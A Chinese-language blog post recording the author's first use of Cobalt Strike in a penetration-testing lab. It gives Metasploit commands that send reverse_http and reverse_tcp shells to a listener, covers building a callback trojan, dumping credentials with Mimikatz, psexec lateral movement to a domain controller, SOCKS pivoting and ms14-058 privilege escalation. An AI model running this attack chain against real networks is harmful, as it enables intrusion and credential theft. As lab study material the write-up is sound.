一、啰嗦一下
想學 cs 是因為在寫這篇 https://www.cnblogs.com/wkzb/p/12358076.html 靶機滲透的博客時,看大佬們的 wp 很多人是用 cs 做的。
系統學習的話內容還是很多的,就從這次靶機滲透開始,記錄一下目前用到的模塊,下面每個小節的服務端與客戶端 ip 可能不相同,因為這篇隨筆是用到哪學到哪,實驗環境不同,長期更新。
二、cs啟動
cabaltstrike 工具使用時分為服務端和客戶端,啟動服務端后可以有很多客戶端連接,團隊合作使用很方便,實驗時也可以服務端客戶端在一台機器啟動。
這次實驗 https://www.cnblogs.com/wkzb/p/12358076.html 還是用這次靶機滲透環境,把服務端和客戶端分開做實驗,以免在一些設置上混淆了。
服務端在 kali 啟動,命令是:./teamserver 本機 ip 連接密碼

客戶端在物理機啟動,Host 填服務端 ip,User 隨便寫,密碼填剛剛設置的 root

三、msf派生權限
先在 cs 開啟監聽,Cobalt Strike->Listeners-Add,Name 隨便填,Host 填寫服務端 ip,Port 填寫服務端設置的端口

擁有 msf shell 的攻擊機與搭建 cobaltstrike 的服務端不需要是同一台主機,端口相通即可實現遠程派生 shell
msf 執行命令
use exploit/windows/local/payload_inject set payload windows/meterpreter/reverse_http set DisablePayloadHandler true #默認情況下,payload_inject執行之后會在本地產生一個新的handler,由於已經有了一個不需要再產生一個,所以這里設置為true set lhost xxxx #cobaltstrike監聽的ip set lport 14444 #cobaltstrike監聽的端口 set session 1 #這里是當前獲得的session的id exploit

可以看到 cs 成功接收到 shell(如下 win7 在靶場中最初設置 ip 是 192.168.136.129,隔了一段時間又拿出來玩,網絡環境有變化,ip 分配到了 130)

右鍵 Interact 調出 beacon 界面,net view 查看當前域中計算機列表,然后執行 shell 命令前面加上 shell 就可以了,例如 shell ipconfig

四、制作木馬
首先創建監聽器用於木馬回連,Host 為 cs 服務端的 ip

Attacks->Packages->Windows Executable 再根據靶機的類型勾選,生成木馬即可

靶機上傳木馬並運行,cs 客戶端WEB機成功上線

五、憑據存儲
密碼讀取
右鍵->Access->Dump Hashes(需要Administrator權限)
右鍵->Access->Run Mimikatz

六、psexec傳遞
獲取憑據后對目標網段進行端口存活探測,因為是 psexec 傳遞登錄,這里僅需探測445端口
命令:portscan ip網段 端口 掃描協議(arp、icmp、none) 線程
例如:portscan 10.10.10.0/24 445 arp 200

工具欄 View->Targets 查看端口探測后的存活主機

新建一個 Listener,注意 Payload 選擇 windows/beacon_smb/bind_pipe

存活主機右鍵->Login->psexec,選擇之前獲取到的憑據信息(明文密文均可),選擇 Listener 及主機 Session


DC成功上線

七、cs派生權限
msf 先設置監聽
msf5 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost ip.ip.ip.ip lhost => ip.ip.ip.ip msf5 exploit(multi/handler) > set lport 2323 lport => 2323 msf5 exploit(multi/handler) > exploit
需要派生的目標右擊選擇Spawn,然后創建一個 windows/foreign/reverse_tcp Listener,再選擇這個監聽器

八、socks代理
主機右鍵->Pivoting->SOCKS Server 開啟 socks4 代理,設置 proxifier 代理服務器,修改 proxifier 默認代理規則,使用攻擊機上的工具對內網做更多操作

Address 填寫 cs 服務端 ip

九、提權
右鍵->Access->Elevate->ms14-058 提到 system 權限


